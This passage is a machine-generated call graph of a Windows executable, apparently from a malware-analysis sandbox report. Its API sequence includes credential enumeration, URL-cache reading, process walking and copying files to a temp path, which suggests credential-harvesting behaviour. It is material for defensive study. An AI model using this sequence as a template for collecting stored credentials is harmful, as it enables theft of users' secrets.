40d6f5 3 API calls 38066 40dc73 38065->38066 38067 40d6f5 3 API calls 38066->38067 38068 40dc89 38067->38068 38069 40d6f5 3 API calls 38068->38069 38070 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38069->38070 38109 40da80 38070->38109 38073->38051 38075 40dbb4 memset memset 38074->38075 38076 409bca GetModuleFileNameW 38075->38076 38076->38058 38079 4447f4 38077->38079 38078 40dc1b 38078->38061 38078->38062 38079->38078 38080 444807 ??2@YAPAXI 38079->38080 38081 44481f 38080->38081 38082 444873 _snwprintf 38081->38082 38083 4448ab wcscpy 38081->38083 38116 44474a 8 API calls 38082->38116 38085 4448bb 38083->38085 38117 44474a 8 API calls 38085->38117 38086 4448a7 38086->38083 38086->38085 38088 4448cd 38118 44474a 8 API calls 38088->38118 38090 4448e2 38119 44474a 8 API calls 38090->38119 38092 4448f7 38120 44474a 8 API calls 38092->38120 38094 44490c 38121 44474a 8 API calls 38094->38121 38096 444921 38122 44474a 8 API calls 38096->38122 38098 444936 38123 44474a 8 API calls 38098->38123 38100 44494b 38124 44474a 8 API calls 38100->38124 38102 444960 ??3@YAXPAX 38102->38078 38104 44db70 38103->38104 38105 40d702 memset GetPrivateProfileStringW 38104->38105 38106 40d752 38105->38106 38107 40d75c WritePrivateProfileStringW 38105->38107 38106->38107 38108 40d758 38106->38108 38107->38108 38108->38065 38110 44db70 38109->38110 38111 40da8d memset 38110->38111 38112 40daac LoadStringW 38111->38112 38113 40dac6 38112->38113 38113->38112 38115 40dade 38113->38115 38125 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38113->38125 38115->37888 38116->38086 38117->38088 38118->38090 38119->38092 38120->38094 38121->38096 38122->38098 38123->38100 38124->38102 38125->38113 38136 409b98 GetFileAttributesW 38126->38136 38128 40daea 38129 40db63 38128->38129 38130 40daef wcscpy wcscpy GetPrivateProfileIntW 38128->38130 38129->37889 38137 40d65d GetPrivateProfileStringW 38130->38137 38132 40db3e 38138 40d65d GetPrivateProfileStringW 38132->38138 38134 40db4f 38139 40d65d GetPrivateProfileStringW 38134->38139 38136->38128 38137->38132 38138->38134 38139->38129 38175 40eaff 38140->38175 38144 411ae2 memset 38143->38144 38145 411b8f 38143->38145 38215 409bca GetModuleFileNameW 38144->38215 38157 411a8b 38145->38157 38147 411b0a wcsrchr 38148 411b22 wcscat 38147->38148 38149 411b1f 38147->38149 38216 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38148->38216 38149->38148 38151 411b67 38217 402afb 38151->38217 38155 411b7f 38273 40ea13 SendMessageW memset SendMessageW 38155->38273 38158 402afb 27 API calls 38157->38158 38159 411ac0 38158->38159 38160 4110dc 38159->38160 38161 41113e 38160->38161 38166 4110f0 38160->38166 38298 40969c LoadCursorW SetCursor 38161->38298 38163 411143 38299 4032b4 38163->38299 38317 444a54 38163->38317 38164 4110f7 _wcsicmp 38164->38166 38165 411157 38167 40ada2 _wcsicmp 38165->38167 38166->38161 38166->38164 38320 410c46 10 API calls 38166->38320 38170 411167 38167->38170 38168 4111af 38170->38168 38171 4111a6 qsort 38170->38171 38171->38168 38174->37971 38176 40eb10 38175->38176 38188 40e8e0 38176->38188 38179 40eb6c memcpy memcpy 38180 40ebb7 38179->38180 38180->38179 38181 40ebf2 ??2@YAPAXI ??2@YAPAXI 38180->38181 38184 40d134 16 API calls 38180->38184 38182 40ec2e ??2@YAPAXI 38181->38182 38185 40ec65 38181->38185 38182->38185 38184->38180 38185->38185 38198 40ea7f 38185->38198 38187 402f49 38187->37971 38189 40e8f2 38188->38189 38190 40e8eb ??3@YAXPAX 38188->38190 38191 40e900 38189->38191 38192 40e8f9 ??3@YAXPAX 38189->38192 38190->38189 38193 40e911 38191->38193 38194 40e90a ??3@YAXPAX 38191->38194 38192->38191 38195 40e931 ??2@YAPAXI ??2@YAPAXI 38193->38195 38196 40e921 ??3@YAXPAX 38193->38196 38197 40e92a ??3@YAXPAX 38193->38197 38194->38193 38195->38179 38196->38197 38197->38195 38199 40aa04 free 38198->38199 38200 40ea88 38199->38200 38201 40aa04 free 38200->38201 38202 40ea90 38201->38202 38203 40aa04 free 38202->38203 38204 40ea98 38203->38204 38205 40aa04 free 38204->38205 38206 40eaa0 38205->38206 38207 40a9ce 4 API calls 38206->38207 38208 40eab3 38207->38208 38209 40a9ce 4 API calls 38208->38209 38210 40eabd 38209->38210 38211 40a9ce 4 API calls 38210->38211 38212 40eac7 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40ead1 38213->38214 38214->38187 38215->38147 38216->38151 38274 40b2cc 38217->38274 38219 402b0a 38220 40b2cc 27 API calls 38219->38220 38221 402b23 38220->38221 38222 40b2cc 27 API calls 38221->38222 38223 402b3a 38222->38223 38224 40b2cc 27 API calls 38223->38224 38225 402b54 38224->38225 38226 40b2cc 27 API calls 38225->38226 38227 402b6b 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b82 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b99 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402bb0 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402bc7 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402bde 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bf5 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402c0c 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402c23 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402c3a 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c51 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c68 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c7f 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c99 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402cb3 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402cd5 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402cf0 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402d0b 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402d26 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402d3e 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d59 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d78 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d93 38270->38271 38272 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38271->38272 38272->38155 38273->38145 38277 40b58d 38274->38277 38276 40b2d1 38276->38219 38278 40b5a4 GetModuleHandleW FindResourceW 38277->38278 38279 40b62e 38277->38279 38280 40b5c2 LoadResource 38278->38280 38282 40b5e7 38278->38282 38279->38276 38281 40b5d0 SizeofResource LockResource 38280->38281 38280->38282 38281->38282 38282->38279 38290 40afcf 38282->38290 38284 40b608 memcpy 38293 40b4d3 memcpy 38284->38293 38286 40b61e 38294 40b3c1 18 API calls 38286->38294 38288 40b626 38295 40b04b 38288->38295 38291 40b04b ??3@YAXPAX 38290->38291 38292 40afd7 ??2@YAPAXI 38291->38292 38292->38284 38293->38286 38294->38288 38296 40b051 ??3@YAXPAX 38295->38296 38297 40b05f 38295->38297 38296->38297 38297->38279 38298->38163 38300 4032c4 38299->38300 38301 40b633 free 38300->38301 38302 403316 38301->38302 38321 44553b 38302->38321 38306 403480 38519 40368c 15 API calls 38306->38519 38308 403489 38309 40b633 free 38308->38309 38310 403495 38309->38310 38310->38165 38311 4033a9 memset memcpy 38312 4033ec wcscmp 38311->38312 38313 40333c 38311->38313 38312->38313 38313->38306 38313->38311 38313->38312 38517 4028e7 11 API calls 38313->38517 38518 40f508 6 API calls 38313->38518 38315 403421 _wcsicmp 38315->38313 38318 444a64 FreeLibrary 38317->38318 38319 444a83 38317->38319 38318->38319 38319->38165 38320->38166 38322 445548 38321->38322 38323 445599 38322->38323 38520 40c768 38322->38520 38324 4455a8 memset 38323->38324 38331 4457f2 38323->38331 38603 403988 38324->38603 38335 445854 38331->38335 38705 403e2d memset memset memset memset memset 38331->38705 38332 445672 38614 403fbe memset memset memset memset memset 38332->38614 38333 4458bb memset memset 38340 414c2e 16 API calls 38333->38340 38386 4458aa 38335->38386 38728 403c9c memset memset memset memset memset 38335->38728 38336 44557a 38383 44558c 38336->38383 38800 4136c0 CoTaskMemFree 38336->38800 38338 44595e memset memset 38345 414c2e 16 API calls 38338->38345 38339 4455e5 38339->38332 38348 44560f 38339->38348 38341 4458f9 38340->38341 38346 40b2cc 27 API calls 38341->38346 38343 445a00 memset memset 38751 414c2e 38343->38751 38344 445b22 38350 445bca 38344->38350 38351 445b38 memset memset memset 38344->38351 38355 44599c 38345->38355 38356 445909 38346->38356 38360 4087b3 338 API calls 38348->38360 38349 445849 38816 40b1ab free free 38349->38816 38357 445c8b memset memset 38350->38357 38425 445cf0 38350->38425 38361 445bd4 38351->38361 38362 445b98 38351->38362 38365 40b2cc 27 API calls 38355->38365 38366 409d1f 6 API calls 38356->38366 38369 414c2e 16 API calls 38357->38369 38358 445585 38801 41366b FreeLibrary 38358->38801 38359 44589f 38817 40b1ab free free 38359->38817 38367 445621 38360->38367 38375 414c2e 16 API calls 38361->38375 38362->38361 38371 445ba2 38362->38371 38368 4459ac 38365->38368 38379 445919 38366->38379 38802 4454bf 20 API calls 38367->38802 38381 409d1f 6 API calls 38368->38381 38382 445cc9 38369->38382 38889 4099c6 wcslen 38371->38889 38372 4456b2 38804 40b1ab free free 38372->38804 38374 40b2cc 27 API calls 38387 445a4f 38374->38387 38389 445be2 38375->38389 38376 403335 38516 4452e5 45 API calls 38376->38516 38377 445d3d 38409 40b2cc 27 API calls 38377->38409 38378 445d88 memset memset memset 38392 414c2e 16 API calls 38378->38392 38818 409b98 GetFileAttributesW 38379->38818 38380 445823 38380->38349 38391 4087b3 338 API calls 38380->38391 38393 4459bc 38381->38393 38394 409d1f 6 API calls 38382->38394 38587 444b06 38383->38587 38384 445879 38384->38359 38405 4087b3 338 API calls 38384->38405 38386->38333 38410 44594a 38386->38410 38766 409d1f wcslen wcslen 38387->38766 38398 40b2cc 27 API calls 38389->38398 38391->38380 38402 445dde 38392->38402 38885 409b98 GetFileAttributesW 38393->38885 38404 445ce1 38394->38404 38395 445bb3 38892 445403 memset 38395->38892 38396 445680 38396->38372 38637 4087b3 memset 38396->38637 38399 445bf3 38398->38399 38408 409d1f 6 API calls 38399->38408 38400 445928 38400->38410 38819 40b6ef 38400->38819 38411 40b2cc 27 API calls 38402->38411 38909 409b98 GetFileAttributesW 38404->38909 38405->38384 38419 445c07 38408->38419 38420 445d54 _wcsicmp 38409->38420 38410->38338 38424 4459ed 38410->38424 38423 445def 38411->38423 38412 4459cb 38412->38424 38433 40b6ef 252 API calls 38412->38433 38416 40b2cc 27 API calls 38417 445a94 38416->38417 38771 40ae18 38417->38771 38418 44566d 38418->38331 38688 413d4c 38418->38688 38429 445389 258 API calls 38419->38429 38430 445d71 38420->38430 38495 445d67 38420->38495 38422 445665 38803 40b1ab free free 38422->38803 38431 409d1f 6 API calls 38423->38431 38424->38343 38424->38344 38425->38376 38425->38377 38425->38378 38426 445389 258 API calls 38426->38350 38435 445c17 38429->38435 38910 445093 23 API calls 38430->38910 38438 445e03 38431->38438 38433->38424 38434 4456d8 38440 40b2cc 27 API calls 38434->38440 38441 40b2cc 27 API calls 38435->38441 38437 44563c 38437->38422 38443 4087b3 338 API calls 38437->38443 38911 409b98 GetFileAttributesW 38438->38911 38439 40b6ef 252 API calls 38439->38376 38445 4456e2 38440->38445 38446 445c23 38441->38446 38442 445d83 38442->38376 38443->38437 38805 413fa6 _wcsicmp _wcsicmp 38445->38805 38450 409d1f 6 API calls 38446->38450 38448 445e12 38455 445e6b 38448->38455 38461 40b2cc 27 API calls 38448->38461 38453 445c37 38450->38453 38451 445aa1 38454 445b17 38451->38454 38469 445ab2 memset 38451->38469 38482 409d1f 6 API calls 38451->38482 38778 40add4 38451->38778 38783 445389 38451->38783 38792 40ae51 38451->38792 38452 4456eb 38457 4456fd memset memset memset memset 38452->38457 38458 4457ea 38452->38458 38459 445389 258 API calls 38453->38459 38886 40aebe 38454->38886 38913 445093 23 API calls 38455->38913 38806 409c70 wcscpy wcsrchr 38457->38806 38809 413d29 38458->38809 38464 445c47 38459->38464 38465 445e33 38461->38465 38471 40b2cc 27 API calls 38464->38471 38472 409d1f 6 API calls 38465->38472 38467 445e7e 38468 445f67 38467->38468 38477 40b2cc 27 API calls 38468->38477 38473 40b2cc 27 API calls 38469->38473 38475 445c53 38471->38475 38476 445e47 38472->38476 38473->38451 38474 409c70 2 API calls 38478 44577e 38474->38478 38479 409d1f 6 API calls 38475->38479 38912 409b98 GetFileAttributesW 38476->38912 38481 445f73 38477->38481 38483 409c70 2 API calls 38478->38483 38484 445c67 38479->38484 38486 409d1f 6 API calls 38481->38486 38482->38451 38487 44578d 38483->38487 38488 445389 258 API calls 38484->38488 38485 445e56 38485->38455 38491 445e83 memset 38485->38491 38489 445f87 38486->38489 38487->38458 38494 40b2cc 27 API calls 38487->38494 38488->38350 38916 409b98 GetFileAttributesW 38489->38916 38493 40b2cc 27 API calls 38491->38493 38496 445eab 38493->38496 38497 4457a8 38494->38497 38495->38376 38495->38439 38498 409d1f 6 API calls 38496->38498 38499 409d1f 6 API calls 38497->38499 38500 445ebf 38498->38500 38501 4457b8 38499->38501 38502 40ae18 9 API calls 38500->38502 38808 409b98 GetFileAttributesW 38501->38808 38512 445ef5 38502->38512 38504 4457c7 38504->38458 38506 4087b3 338 API calls 38504->38506 38505 40ae51 9 API calls 38505->38512 38506->38458 38507 445f5c 38509 40aebe FindClose 38507->38509 38508 40add4 2 API calls 38508->38512 38509->38468 38510 40b2cc 27 API calls 38510->38512 38511 409d1f 6 API calls 38511->38512 38512->38505 38512->38507 38512->38508 38512->38510 38512->38511 38514 445f3a 38512->38514 38914 409b98 GetFileAttributesW 38512->38914 38915 445093 23 API calls 38514->38915 38516->38313 38517->38315 38518->38313 38519->38308 38521 40c775 38520->38521 38917 40b1ab free free 38521->38917 38523 40c788 38918 40b1ab free free 38523->38918 38525 40c790 38919 40b1ab free free 38525->38919 38527 40c798 38528 40aa04 free 38527->38528 38529 40c7a0 38528->38529 38920 40c274 memset 38529->38920 38534 40a8ab 9 API calls 38535 40c7c3 38534->38535 38536 40a8ab 9 API calls 38535->38536 38537 40c7d0 38536->38537 38949 40c3c3 38537->38949 38541 40c877 38550 40bdb0 38541->38550 38542 40c86c 38991 4053fe 39 API calls 38542->38991 38544 40c7e5 38544->38541 38544->38542 38549 40c634 49 API calls 38544->38549 38974 40a706 38544->38974 38549->38544 39159 404363 38550->39159 38553 40bf5d 39179 40440c 38553->39179 38555 40bdee 38555->38553 38558 40b2cc 27 API calls 38555->38558 38556 40bddf CredEnumerateW 38556->38555 38559 40be02 wcslen 38558->38559 38559->38553 38562 40be1e 38559->38562 38560 40be26 wcsncmp 38560->38562 38562->38553 38562->38560 38564 40be7d memset 38562->38564 38565 40bea7 memcpy 38562->38565 38566 40bf11 wcschr 38562->38566 38567 40b2cc 27 API calls 38562->38567 38569 40bf43 LocalFree 38562->38569 39182 40bd5d 28 API calls 38562->39182 39183 404423 38562->39183 38564->38562 38564->38565 38565->38562 38565->38566 38566->38562 38568 40bef6 _wcsnicmp 38567->38568 38568->38562 38568->38566 38569->38562 38570 4135f7 39196 4135e0 38570->39196 38573 40b2cc 27 API calls 38574 41360d 38573->38574 38575 40a804 8 API calls 38574->38575 38576 413613 38575->38576 38577 41361b 38576->38577 38578 41363e 38576->38578 38579 40b273 27 API calls 38577->38579 38580 4135e0 FreeLibrary 38578->38580 38581 413625 GetProcAddress 38579->38581 38582 413643 38580->38582 38581->38578 38583 413648 38581->38583 38582->38336 38584 413658 38583->38584 38585 4135e0 FreeLibrary 38583->38585 38584->38336 38586 413666 38585->38586 38586->38336 39199 4449b9 38587->39199 38590 444c1f 38590->38323 38591 4449b9 42 API calls 38593 444b4b 38591->38593 38592 444c15 38594 4449b9 42 API calls 38592->38594 38593->38592 39220 444972 GetVersionExW 38593->39220 38594->38590 38596 444b99 memcmp 38601 444b8c 38596->38601 38597 444c0b 39224 444a85 42 API calls 38597->39224 38601->38596 38601->38597 39221 444aa5 42 API calls 38601->39221 39222 40a7a0 GetVersionExW 38601->39222 39223 444a85 42 API calls 38601->39223 38604 40399d 38603->38604 39225 403a16 38604->39225 38606 403a09 39239 40b1ab free free 38606->39239 38608 4039a3 38608->38606 38612 4039f4 38608->38612 39236 40a02c CreateFileW 38608->39236 38609 403a12 wcsrchr 38609->38339 38612->38606 38613 4099c6 2 API calls 38612->38613 38613->38606 38615 414c2e 16 API calls 38614->38615 38616 404048 38615->38616 38617 414c2e 16 API calls 38616->38617 38618 404056 38617->38618 38619 409d1f 6 API calls 38618->38619 38620 404073 38619->38620 38621 409d1f 6 API calls 38620->38621 38622 40408e 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 4040a6 38623->38624 38625 403af5 20 API calls 38624->38625 38626 4040ba 38625->38626 38627 403af5 20 API calls 38626->38627 38628 4040cb 38627->38628 39266 40414f memset 38628->39266 38630 404140 39280 40b1ab free free 38630->39280 38632 4040ec memset 38635 4040e0 38632->38635 38633 404148 38633->38396 38634 4099c6 2 API calls 38634->38635 38635->38630 38635->38632 38635->38634 38636 40a8ab 9 API calls 38635->38636 38636->38635 39293 40a6e6 WideCharToMultiByte 38637->39293 38639 4087ed 39294 4095d9 memset 38639->39294 38642 408953 38642->38396 38643 408809 memset memset memset memset memset 38644 40b2cc 27 API calls 38643->38644 38645 4088a1 38644->38645 38646 409d1f 6 API calls 38645->38646 38647 4088b1 38646->38647 38648 40b2cc 27 API calls 38647->38648 38649 4088c0 38648->38649 38650 409d1f 6 API calls 38649->38650 38651 4088d0 38650->38651 38652 40b2cc 27 API calls 38651->38652 38653 4088df 38652->38653 38654 409d1f 6 API calls 38653->38654 38655 4088ef 38654->38655 38656 40b2cc 27 API calls 38655->38656 38657 4088fe 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 40890e 38658->38659 38660 40b2cc 27 API calls 38659->38660 38661 40891d 38660->38661 38662 409d1f 6 API calls 38661->38662 38663 40892d 38662->38663 39313 409b98 GetFileAttributesW 38663->39313 38665 40893e 38666 408943 38665->38666 38667 408958 38665->38667 39314 407fdf 75 API calls 38666->39314 39315 409b98 GetFileAttributesW 38667->39315 38670 408964 38671 408969 38670->38671 38672 40897b 38670->38672 39316 4082c7 199 API calls 38671->39316 39317 409b98 GetFileAttributesW 38672->39317 38689 40b633 free 38688->38689 38690 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38689->38690 38691 413f00 Process32NextW 38690->38691 38692 413da5 OpenProcess 38691->38692 38693 413f17 CloseHandle 38691->38693 38694 413df3 memset 38692->38694 38697 413eb0 38692->38697 38693->38434 39615 413f27 38694->39615 38696 413ebf free 38696->38697 38697->38691 38697->38696 38698 4099f4 3 API calls 38697->38698 38698->38697 38700 413e37 GetModuleHandleW 38701 413e1f 38700->38701 38702 413e46 GetProcAddress 38700->38702 38701->38700 39620 413959 38701->39620 39636 413ca4 38701->39636 38702->38701 38704 413ea2 CloseHandle 38704->38697 38706 414c2e 16 API calls 38705->38706 38707 403eb7 38706->38707 38708 414c2e 16 API calls 38707->38708 38709 403ec5 38708->38709 38710 409d1f 6 API calls 38709->38710 38711 403ee2 38710->38711 38712 409d1f 6 API calls 38711->38712 38713 403efd 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 403f15 38714->38715 38716 403af5 20 API calls 38715->38716 38717 403f29 38716->38717 38718 403af5 20 API calls 38717->38718 38719 403f3a 38718->38719 38720 40414f 33 API calls 38719->38720 38721 403f4f 38720->38721 38722 403faf 38721->38722 38724 403f5b memset 38721->38724 38726 4099c6 2 API calls 38721->38726 38727 40a8ab 9 API calls 38721->38727 39650 40b1ab free free 38722->39650 38724->38721 38725 403fb7 38725->38380 38726->38721 38727->38721 38729 414c2e 16 API calls 38728->38729 38730 403d26 38729->38730 38731 414c2e 16 API calls 38730->38731 38732 403d34 38731->38732 38733 409d1f 6 API calls 38732->38733 38734 403d51 38733->38734 38735 409d1f 6 API calls 38734->38735 38736 403d6c 38735->38736 38737 409d1f 6 API calls 38736->38737 38738 403d84 38737->38738 38739 403af5 20 API calls 38738->38739 38740 403d98 38739->38740 38741 403af5 20 API calls 38740->38741 38742 403da9 38741->38742 38743 40414f 33 API calls 38742->38743 38744 403dbe 38743->38744 38745 403e1e 38744->38745 38746 403dca memset 38744->38746 38749 4099c6 2 API calls 38744->38749 38750 40a8ab 9 API calls 38744->38750 39651 40b1ab free free 38745->39651 38746->38744 38748 403e26 38748->38384 38749->38744 38750->38744 38752 414b81 9 API calls 38751->38752 38753 414c40 38752->38753 38754 414c73 memset 38753->38754 39652 409cea 38753->39652 38755 414c94 38754->38755 39655 414592 RegOpenKeyExW 38755->39655 38759 414c64 38759->38374 38760 414cc1 38761 414cf4 wcscpy 38760->38761 39656 414bb0 wcscpy 38760->39656 38761->38759 38763 414cd2 39657 4145ac RegQueryValueExW 38763->39657 38765 414ce9 RegCloseKey 38765->38761 38767 409d62 38766->38767 38768 409d43 wcscpy 38766->38768 38767->38416 38769 409719 2 API calls 38768->38769 38770 409d51 wcscat 38769->38770 38770->38767 38772 40aebe FindClose 38771->38772 38773 40ae21 38772->38773 38774 4099c6 2 API calls 38773->38774 38775 40ae35 38774->38775 38776 409d1f 6 API calls 38775->38776 38777 40ae49 38776->38777 38777->38451 38779 40ade0 38778->38779 38780 40ae0f 38778->38780 38779->38780 38781 40ade7 wcscmp 38779->38781 38780->38451 38781->38780 38782 40adfe wcscmp 38781->38782 38782->38780 38784 40ae18 9 API calls 38783->38784 38790 4453c4 38784->38790 38785 40ae51 9 API calls 38785->38790 38786 4453f3 38788 40aebe FindClose 38786->38788 38787 40add4 2 API calls 38787->38790 38789 4453fe 38788->38789 38789->38451 38790->38785 38790->38786 38790->38787 38791 445403 253 API calls 38790->38791 38791->38790 38793 40ae7b FindNextFileW 38792->38793 38794 40ae5c FindFirstFileW 38792->38794 38795 40ae94 38793->38795 38796 40ae8f 38793->38796 38794->38795 38798 40aeb6 38795->38798 38799 409d1f 6 API calls 38795->38799 38797 40aebe FindClose 38796->38797 38797->38795 38798->38451 38799->38798 38800->38358 38801->38383 38802->38437 38803->38418 38804->38418 38805->38452 38807 409c89 38806->38807 38807->38474 38808->38504 38810 413d39 38809->38810 38811 413d2f FreeLibrary 38809->38811 38812 40b633 free 38810->38812 38811->38810 38813 413d42 38812->38813 38814 40b633 free 38813->38814 38815 413d4a 38814->38815 38815->38331 38816->38335 38817->38386 38818->38400 38820 44db70 38819->38820 38821 40b6fc memset 38820->38821 38822 409c70 2 API calls 38821->38822 38823 40b732 wcsrchr 38822->38823 38824 40b743 38823->38824 38825 40b746 memset 38823->38825 38824->38825 38826 40b2cc 27 API calls 38825->38826 38827 40b76f 38826->38827 38828 409d1f 6 API calls 38827->38828 38829 40b783 38828->38829 39658 409b98 GetFileAttributesW 38829->39658 38831 40b792 38832 40b7c2 38831->38832 38833 409c70 2 API calls 38831->38833 39659 40bb98 38832->39659 38835 40b7a5 38833->38835 38837 40b2cc 27 API calls 38835->38837 38840 40b7b2 38837->38840 38838 40b837 CloseHandle 38842 40b83e memset 38838->38842 38839 40b817 39693 409a45 GetTempPathW 38839->39693 38844 409d1f 6 API calls 38840->38844 39692 40a6e6 WideCharToMultiByte 38842->39692 38844->38832 38845 40b827 CopyFileW 38845->38842 38846 40b866 38847 444432 121 API calls 38846->38847 38848 40b879 38847->38848 38849 40bad5 38848->38849 38850 40b273 27 API calls 38848->38850 38851 40baeb 38849->38851 38852 40bade DeleteFileW 38849->38852 38853 40b89a 38850->38853 38854 40b04b ??3@YAXPAX 38851->38854 38852->38851 38855 438552 134 API calls 38853->38855 38856 40baf3 38854->38856 38857 40b8a4 38855->38857 38856->38410 38858 40bacd 38857->38858 38860 4251c4 137 API calls 38857->38860 38859 443d90 111 API calls 38858->38859 38859->38849 38883 40b8b8 38860->38883 38861 40bac6 39705 424f26 123 API calls 38861->39705 38862 40b8bd memset 39696 425413 17 API calls 38862->39696 38865 425413 17 API calls 38865->38883 38868 40a71b MultiByteToWideChar 38868->38883 38869 40a734 MultiByteToWideChar 38869->38883 38872 40b9b5 memcmp 38872->38883 38873 4099c6 2 API calls 38873->38883 38874 404423 37 API calls 38874->38883 38876 40bb3e memset memcpy 39706 40a734 MultiByteToWideChar 38876->39706 38877 4251c4 137 API calls 38877->38883 38880 40bb88 LocalFree 38880->38883 38883->38861 38883->38862 38883->38865 38883->38868 38883->38869 38883->38872 38883->38873 38883->38874 38883->38876 38883->38877 38884 40ba5f memcmp 38883->38884 39697 4253ef 16 API calls 38883->39697 39698 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38883->39698 39699 4253af 17 API calls 38883->39699 39700 4253cf 17 API calls 38883->39700 39701 447280 memset 38883->39701 39702 447960 memset memcpy memcpy memcpy 38883->39702 39703 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38883->39703 39704 447920 memcpy memcpy memcpy 38883->39704 38884->38883 38885->38412 38887 40aed1 38886->38887 38888 40aec7 FindClose 38886->38888 38887->38344 38888->38887 38890 4099d7 38889->38890 38891 4099da memcpy 38889->38891 38890->38891 38891->38395 38893 40b2cc 27 API calls 38892->38893 38894 44543f 38893->38894 38895 409d1f 6 API calls 38894->38895 38896 44544f 38895->38896 39798 409b98 GetFileAttributesW 38896->39798 38898 44545e 38899 445476 38898->38899 38900 40b6ef 252 API calls 38898->38900 38901 40b2cc 27 API calls 38899->38901 38900->38899 38902 445482 38901->38902 38903 409d1f 6 API calls 38902->38903 38904 445492 38903->38904 39799 409b98 GetFileAttributesW 38904->39799 38906 4454a1 38907 4454b9 38906->38907 38908 40b6ef 252 API calls 38906->38908 38907->38426 38908->38907 38909->38425 38910->38442 38911->38448 38912->38485 38913->38467 38914->38512 38915->38512 38916->38495 38917->38523 38918->38525 38919->38527 38921 414c2e 16 API calls 38920->38921 38922 40c2ae 38921->38922 38992 40c1d3 38922->38992 38927 40c3be 38944 40a8ab 38927->38944 38928 40afcf 2 API calls 38929 40c2fd FindFirstUrlCacheEntryW 38928->38929 38930 40c3b6 38929->38930 38931 40c31e wcschr 38929->38931 38932 40b04b ??3@YAXPAX 38930->38932 38933 40c331 38931->38933 38934 40c35e FindNextUrlCacheEntryW 38931->38934 38932->38927 38935 40a8ab 9 API calls 38933->38935 38934->38931 38936 40c373 GetLastError 38934->38936 38939 40c33e wcschr 38935->38939 38937 40c3ad FindCloseUrlCache 38936->38937 38938 40c37e 38936->38938 38937->38930 38940 40afcf 2 API calls 38938->38940 38939->38934 38941 40c34f 38939->38941 38942 40c391 FindNextUrlCacheEntryW 38940->38942 38943 40a8ab 9 API calls 38941->38943 38942->38931 38942->38937 38943->38934 39086 40a97a 38944->39086 38947 40a8cc 38947->38534 38948 40a8d0 7 API calls 38948->38947 39091 40b1ab free free 38949->39091 38951 40c3dd 38952 40b2cc 27 API calls 38951->38952 38953 40c3e7 38952->38953 39092 414592 RegOpenKeyExW 38953->39092 38955 40c3f4 38956 40c50e 38955->38956 38957 40c3ff 38955->38957 38971 405337 38956->38971 38958 40a9ce 4 API calls 38957->38958 38959 40c418 memset 38958->38959 39093 40aa1d 38959->39093 38962 40c471 38964 40c47a _wcsupr 38962->38964 38963 40c505 RegCloseKey 38963->38956 38965 40a8d0 7 API calls 38964->38965 38966 40c498 38965->38966 38967 40a8d0 7 API calls 38966->38967 38968 40c4ac memset 38967->38968 38969 40aa1d 38968->38969 38970 40c4e4 RegEnumValueW 38969->38970 38970->38963 38970->38964 39095 405220 38971->39095 38975 4099c6 2 API calls 38974->38975 38976 40a714 _wcslwr 38975->38976 38977 40c634 38976->38977 39152 405361 38977->39152 38980 40c65c wcslen 39155 4053b6 39 API calls 38980->39155 38981 40c71d wcslen 38981->38544 38983 40c713 39158 4053df 39 API calls 38983->39158 38984 40c677 38984->38983 39156 40538b 39 API calls 38984->39156 38987 40c6a5 38987->38983 38988 40c6a9 memset 38987->38988 38989 40c6d3 38988->38989 39157 40c589 43 API calls 38989->39157 38991->38541 38993 40ae18 9 API calls 38992->38993 38999 40c210 38993->38999 38994 40ae51 9 API calls 38994->38999 38995 40c264 38996 40aebe FindClose 38995->38996 38998 40c26f 38996->38998 38997 40add4 2 API calls 38997->38999 39004 40e5ed memset memset 38998->39004 38999->38994 38999->38995 38999->38997 39000 40c231 _wcsicmp 38999->39000 39001 40c1d3 35 API calls 38999->39001 39000->38999 39002 40c248 39000->39002 39001->38999 39017 40c084 22 API calls 39002->39017 39005 414c2e 16 API calls 39004->39005 39006 40e63f 39005->39006 39007 409d1f 6 API calls 39006->39007 39008 40e658 39007->39008 39018 409b98 GetFileAttributesW 39008->39018 39010 40e667 39011 40e680 39010->39011 39013 409d1f 6 API calls 39010->39013 39019 409b98 GetFileAttributesW 39011->39019 39013->39011 39014 40e68f 39015 40c2d8 39014->39015 39020 40e4b2 39014->39020 39015->38927 39015->38928 39017->38999 39018->39010 39019->39014 39041 40e01e 39020->39041 39022 40e593 39024 40e5b0 39022->39024 39025 40e59c DeleteFileW 39022->39025 39023 40e521 39023->39022 39064 40e175 39023->39064 39026 40b04b ??3@YAXPAX 39024->39026 39025->39024 39027 40e5bb 39026->39027 39029 40e5c4 CloseHandle 39027->39029 39030 40e5cc 39027->39030 39029->39030 39032 40b633 free 39030->39032 39031 40e573 39033 40e584 39031->39033 39034 40e57c CloseHandle 39031->39034 39035 40e5db 39032->39035 39085 40b1ab free free 39033->39085 39034->39033 39038 40b633 free 39035->39038 39037 